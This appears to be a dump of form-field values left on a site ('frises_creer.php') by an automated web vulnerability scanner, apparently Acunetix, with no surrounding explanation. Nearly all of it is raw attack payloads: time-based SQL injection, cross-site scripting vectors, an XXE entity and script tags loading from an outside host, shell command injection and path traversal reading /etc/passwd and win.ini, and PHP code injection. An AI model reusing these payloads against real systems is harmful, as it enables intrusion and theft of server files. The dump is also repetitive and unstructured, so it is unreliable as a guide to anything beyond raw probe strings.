frises_creer.php/.

1

Mr.

1

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

1

acunetix_wvs_invalid_filename

1

frises_creer.php

1

frises_creer.php

1

frises_creer.php/.

1

Mr.

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1 and sleep(4)

Mr.

1 or (sleep(4)+1) limit 1 --

Mr.

1' and sleep(4)='

Mr.

http://www.acunetix.tst

Mr.

1' and (sleep(4)+1) limit 1 --

Mr.

1" and sleep(4)="

Mr.

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

Mr.

1' or (sleep(4)+1) limit 1 --

Mr.

1" or (sleep(4)+1) limit 1 --

Mr.

1'=sleep(4)='

Mr.

1"=sleep(4)="

Mr.

1'+(select 1 from (select sleep(4))A)+'

Mr.

1;select pg_sleep(4); --

Mr.

1';select pg_sleep(4); --

Mr.

1; waitfor delay '0:0:4' --

Mr.

1'; waitfor delay '0:0:4' --

Mr.

1"; waitfor delay '0:0:4' --

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

1

http://www.acunetix.tst

1

Mr.

1

Mr.

1

Mr.

1

Mr.

'"

Mr.

<!--

'"

1

<!--

1

Mr.

1'"()&%<ScRiPt >prompt(940261)</ScRiPt>

Mr.

1_928940

Mr.

&cat /etc/passwd&

Mr.

'&cat /etc/passwd&'

Mr.

"&cat /etc/passwd&"

Mr.

cat /etc/passwd

Mr.

`cat /etc/passwd`

Mr.

|cat /etc/passwd#

Mr.

'|'ld

Mr.

"|"ld

Mr.

;cat /etc/passwd;

Mr.

';cat /etc/passwd;'

Mr.

";cat /etc/passwd;"

Mr.

||cat /etc/passwd

Mr.

&dir

Mr.

'&dir&'

Mr.

"&dir&"

Mr.

|dir

Mr.

'|dir

Mr.

"|dir

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.' and sleep(56.192)='

1

Mr.' and (sleep(56.192)+1) limit 1 --

1

Mr." and sleep(56.192)="

1

Mr.' or (sleep(56.192)+1) limit 1 --

1

Mr." or (sleep(56.192)+1) limit 1 --

1

Mr.'=sleep(56.192)='

1

Mr."=sleep(56.192)="

1

Mr.'+(select 1 from (select sleep(56.192))A)+'

1

Mr. and sleep(56.192)

1

Mr. or (sleep(56.192)+1) limit 1 --

1

Mr.';select pg_sleep(56.192); --

1

Mr.'; waitfor delay '0:0:56.192' --

1

Mr."; waitfor delay '0:0:56.192' --

1

Mr.

1

Mr.

1'"

Mr.

\

Mr.

1xa7

Mr.

@@8k4FE

Mr.

JyI=

Mr.

'"

Mr.

''""

Mr.'"()&%<ScRiPt >prompt(921437)</ScRiPt>

1

Mr._956325

1

acu5168<s1﹥s2ʺs3ʹuca5168

1

acux10023z1z2abcxuca10023

1

Mr.<ScRiPt >prompt(948430)</ScRiPt>

1

Mr.<script>prompt(949564)</script>

1

Mr.<ScRiPt >prompt(932361)</ScRiPt>

1

Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?921887></ScRiPt>

1

Mr.<ScRiPt >prompt(992079)</ScRiPt>

1

Mr.<video><source onerror="javascript:prompt(907074)">

1

Mr.<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992487)"></g></svg>

1

Mr.<div style=width:expression(prompt(981640))>

1

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='953138'>

1

Mr.<body onload=prompt(995888)>

1

Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(955077)>

1

Mr.<img src=xyz OnErRor=prompt(965736)>

1

Mr.<img/src=">" onerror=alert(988756)>

1

Mr.%3CScRiPt%20%3Eprompt(998431)%3C/sCripT%3E

1

<img acu onmouseover=prompt(982030) //>

1

Mr.<input autofocus onfocus=prompt(906643)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

Mr._UpIls <ScRiPt >prompt(976247)</ScRiPt>

1

Mr.

1

1'"

1

\

1

1xa7

1

@@2vENF

1

JyI=

1

'"

1

''""

1

&cat /etc/passwd&

1

'&cat /etc/passwd&'

1

"&cat /etc/passwd&"

1

cat /etc/passwd

1

`cat /etc/passwd`

1

|cat /etc/passwd#

1

'|'ld

1

"|"ld

1

;cat /etc/passwd;

1

';cat /etc/passwd;'

1

";cat /etc/passwd;"

1

||cat /etc/passwd

1

&dir

1

'&dir&'

1

"&dir&"

1

|dir

1

'|dir

1

"|dir

1

Mr.

../../../../../../../../../../etc/passwd

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

../../../../../../../../../../etc/passwd.jpg

Mr.

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

/../..//../..//../..//../..//../..//etc/passwd.jpg

Mr.

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Mr.

/etc/passwd

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Mr.

................etc/passwd

Mr.

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

Mr.

file:///etc/passwd

Mr.

/\../\../\../\../\../\../\../etc/passwd

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

Mr.

../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../boot.ini

Mr.

../../../../../../../../../../windows/win.ini.jpg

Mr.

windowswin.ini

Mr.

................windowswin.ini

Mr.

..\..\..\..\..\..\..\..\windows\win.ini

Mr.

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Mr.

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

../../../../../../../../../../etc/passwd.

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

/../..//../..//../..//../..//../..//etc/passwd.

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

/etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

................etc/passwd

1

invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1

file:///etc/passwd

1

/\../\../\../\../\../\../\../etc/passwd

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.

1

windowswin.ini

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

response.write(9429861*9312128)

Mr.

'+response.write(9429861*9312128)+'

Mr.

1

Mr.

"+response.write(9429861*9312128)+"

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

${99662+99884}

${99446+99289}

1

response.write(9486943*9883739)

1

'+response.write(9486943*9883739)+'

1

"+response.write(9486943*9883739)+"

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

Mr.

'"()

Mr.

)

1

Mr.

!(()&&!|*|*|

Mr.

^(#$!@#$)(()))******

'"()

1

Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Mr.

1some_inexistent_file_with_long_name%00.jpg

Mr.

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Mr.

testasp.vulnweb.com

)

1

!(()&&!|*|*|

1

^(#$!@#$)(()))******

1

Mr.

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.

1

1some_inexistent_file_with_long_name%00.

1

http://testasp.vulnweb.com/t/fit.txt?%00.

1

testasp.vulnweb.com

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/fit.txt

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

http://testasp.vulnweb.com/t/fit.txt

1

Mr.

1

Mr.

1

Mr.

Mr.

268435455

Mr.

h

Mr.

..

Mr.

1e309

Mr.

'"\'\");|]*{ <>''

Mr.

Mr.

1

Mr.

;print(md5(acunetix_wvs_security_test));

Mr.

';print(md5(acunetix_wvs_security_test));$a='

Mr.

";print(md5(acunetix_wvs_security_test));$a="

Mr.

${@print(md5(acunetix_wvs_security_test))}

Mr.

${@print(md5(acunetix_wvs_security_test))}\

;print(md5(acunetix_wvs_security_test));

1

';print(md5(acunetix_wvs_security_test));$a='

1

";print(md5(acunetix_wvs_security_test));$a="

1

${@print(md5(acunetix_wvs_security_test))}

1

${@print(md5(acunetix_wvs_security_test))}\

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

acunetix_wvs_invalid_filename

Mr.

frises_creer.php

1

Mr.

frises_creer.php

Mr.

frises_creer.php/.

268435455

1

h

1

..

1

1e309

1

'"\'\");|]*{ <>''

1

Mr.

1

1

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

1

acunetix_wvs_invalid_filename

1

frises_creer.php

1

frises_creer.php

1

frises_creer.php/.

1

Mr.

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://www.acunetix.tst

Mr.

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

Mr.

1

Mr.

1

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

1

http://www.acunetix.tst

1

Mr.

1 and sleep(4)

Mr.

1 or (sleep(4)+1) limit 1 --

Mr.

1' and sleep(4)='

Mr.

1' and (sleep(4)+1) limit 1 --

Mr.

1

Mr.

1

Mr.

1" and sleep(4)="

Mr.

1' or (sleep(4)+1) limit 1 --

Mr.

1" or (sleep(4)+1) limit 1 --

Mr.

1'=sleep(4)='

Mr.

1"=sleep(4)="

Mr.

1'+(select 1 from (select sleep(4))A)+'

Mr.

1;select pg_sleep(4); --

Mr.

1';select pg_sleep(4); --

Mr.

1; waitfor delay '0:0:4' --

Mr.

1'; waitfor delay '0:0:4' --

Mr.

1"; waitfor delay '0:0:4' --

Mr.

'"

Mr.

<!--

Mr.

1

'"

1

<!--

1

Mr.

1'"()&%<ScRiPt >prompt(921961)</ScRiPt>

Mr.

1_958726

Mr.

&cat /etc/passwd&

Mr.

'&cat /etc/passwd&'

Mr.

"&cat /etc/passwd&"

Mr.

cat /etc/passwd

Mr.

`cat /etc/passwd`

Mr.

|cat /etc/passwd#

Mr.

'|'ld

Mr.

'|'ld

Mr.

'|'ld

Mr.

'|'ld

Mr.

"|"ld

Mr.

;cat /etc/passwd;

Mr.

';cat /etc/passwd;'

Mr.

";cat /etc/passwd;"

Mr.

||cat /etc/passwd

Mr.

&dir

Mr.

'&dir&'

Mr.

"&dir&"

Mr.

|dir

Mr.

|dir

Mr.

|dir

Mr.

|dir

Mr.

'|dir

Mr.

"|dir

Mr.

1

Mr.

1

Mr.' and sleep(56.192)='

1

Mr.' and (sleep(56.192)+1) limit 1 --

1

Mr." and sleep(56.192)="

1

Mr.' or (sleep(56.192)+1) limit 1 --

1

Mr." or (sleep(56.192)+1) limit 1 --

1

Mr.'=sleep(56.192)='

1

Mr."=sleep(56.192)="

1

Mr.'+(select 1 from (select sleep(56.192))A)+'

1

Mr. and sleep(56.192)

1

Mr. or (sleep(56.192)+1) limit 1 --

1

Mr.';select pg_sleep(56.192); --

1

Mr.'; waitfor delay '0:0:56.192' --

1

Mr."; waitfor delay '0:0:56.192' --

1

Mr.

1

Mr.

1'"

Mr.

\

Mr.

1xa7

Mr.

@@OeVaI

Mr.

JyI=

Mr.

'"

Mr.

''""

Mr.'"()&%<ScRiPt >prompt(978841)</ScRiPt>

1

Mr._909249

1

acu4709<s1﹥s2ʺs3ʹuca4709

1

acux1659z1z2abcxuca1659

1

Mr.<ScRiPt >prompt(932100)</ScRiPt>

1

Mr.<script>prompt(927463)</script>

1

Mr.<ScRiPt >prompt(988345)</ScRiPt>

1

Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934368></ScRiPt>

1

Mr.<ScRiPt >prompt(916492)</ScRiPt>

1

Mr.<video><source onerror="javascript:prompt(999136)">

1

Mr.<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997877)"></g></svg>

1

Mr.<div style=width:expression(prompt(975140))>

1

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='972973'>

1

Mr.<body onload=prompt(942766)>

1

Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985838)>

1

Mr.<img src=xyz OnErRor=prompt(955137)>

1

Mr.<img/src=">" onerror=alert(940153)>

1

Mr.%3CScRiPt%20%3Eprompt(933576)%3C/sCripT%3E

1

<img acu onmouseover=prompt(991396) //>

1

Mr.<input autofocus onfocus=prompt(976099)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

Mr._tOSU0 <ScRiPt >prompt(916358)</ScRiPt>

1

Mr.

1

1'"

1

\

1

1xa7

1

@@lFavB

1

JyI=

1

'"

1

''""

1

&cat /etc/passwd&

1

'&cat /etc/passwd&'

1

"&cat /etc/passwd&"

1

cat /etc/passwd

1

`cat /etc/passwd`

1

|cat /etc/passwd#

1

'|'ld

1

"|"ld

1

;cat /etc/passwd;

1

';cat /etc/passwd;'

1

";cat /etc/passwd;"

1

||cat /etc/passwd

1

&dir

1

'&dir&'

1

"&dir&"

1

|dir

1

'|dir

1

"|dir

1

Mr.

../../../../../../../../../../etc/passwd

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

../../../../../../../../../../etc/passwd.jpg

Mr.

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

/../..//../..//../..//../..//../..//etc/passwd.jpg

Mr.

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Mr.

/etc/passwd

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Mr.

................etc/passwd

Mr.

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.